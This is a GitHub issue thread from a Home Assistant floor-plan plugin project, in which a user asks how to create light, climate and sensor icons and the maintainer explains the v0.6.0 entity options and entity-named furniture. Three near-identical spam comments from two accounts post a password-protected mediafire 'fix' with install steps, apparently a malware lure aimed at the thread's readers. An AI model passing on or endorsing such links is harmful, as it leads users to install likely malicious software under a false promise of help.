### ISSUE TITLE
Light and text icons

### ISSUE THREAD

**Issue by FilipCZE** [shmuelzon/home-assistant-floor-plan#74]
**Question**
Hi!
As I hope to understand correctly, there are active tap icons for the lights - these are made by additional settings that allow you to customize the entity according to your needs.?

Can you please explain the process how to make these light icons and also climate or temp sensor icons?

I tried to reveal additional settings that allow you to customize the entity according to your needs. but with no action. I was unable to change anything.

![image](https://github.com/user-attachments/assets/3cc36463-722e-4fc8-b091-a2ca239d07ce)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by shmuelzon** [comment]
Hey,

Are you referring to this window?
![image](https://github.com/shmuelzon/home-assistant-floor-plan/blob/v0.6.0/doc/entityOptions.png?raw=true)
If so, that's a new feature that I only created a release for just now. You'll need v0.6.0 or above.

As for other entities like climate or sensors, you'll need to add some piece of furniture to your SH3D project that has a name matching the entity name in Home Assistant, e.g., `climate.xxx` or `sensor.xxx`. When this plugin will create the floorplan YAML file, it will place state icons or labels on top of the furniture with the sensor information.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by FilipCZE** [comment]
Nice! I can see the new version from this morning. I was installing yesterday co I downloaded the version 0.5.x Good to know! Now rendering, and hope to be sucessfull at Hassio dashboard.
